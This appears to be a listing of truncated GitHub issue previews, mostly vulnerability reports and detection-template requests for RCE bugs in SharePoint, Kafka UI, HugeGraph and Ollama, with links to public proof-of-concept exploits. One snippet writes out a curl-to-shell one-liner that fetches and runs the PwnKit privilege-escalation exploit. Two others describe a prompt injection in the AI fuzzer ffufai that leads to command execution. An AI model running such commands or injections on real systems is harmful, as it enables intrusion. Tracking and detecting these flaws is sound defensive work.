-
Just like what I described in https://github.com/jthack/ffufai/issues/3
we can see both the URL and headers parameters are susceptible to RCE. For instance, a custom header could include any system c…
-
### Template for?
CVE-2024-38094 CVE-2024-38024 CVE-2024-38023
### Details:
PoC
https://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC
-
https://github.com/triton-inference-server/dali_backend/ is awesome for reading and preprocessing images
It would be nice to have a more developed builtin solution for decoding audio/videos.
Cur…
-
## Summary
3 new RCEs in Apache Kafka UI
### Basic example
https://github.blog/security/vulnerability-research/3-ways-to-get-remote-code-execution-in-kafka-ui/
### Motivation
RCE is k…
-
Key points:
- Redis 4.x / 5.x --> https://github.com/jas502n/Redis-RCE
- [PE] PwnKit --> https://github.com/ly4k/PwnKit
- -` sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/…
-
Hi Team,
I would like to implement a plugin to detect CVE-2024-27348 which is related to Apache HugeGraph.
Details:
https://nvd.nist.gov/vuln/detail/CVE-2024-27348
https://github.com/advisories/…
-
The details have been sent to jc21's email.
-
Was trying to run the script, but unfortunately with no results.
The script returns empty values on all functions being run.
The target website is of version 3.9.7.
The code returns this resul…
-
Prompt injection can lead to arbitrary Remote Code Execution (RCE) when user-supplied inputs, such as a URL, are not properly sanitized. In this example (./ffufai.py --max-extensions 5 -u https://he…
-
According to [this research](https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032):
> Ollama’s HTTP server exposes [multiple API endpoints](https://github.com/ollama/ollama/blob/main…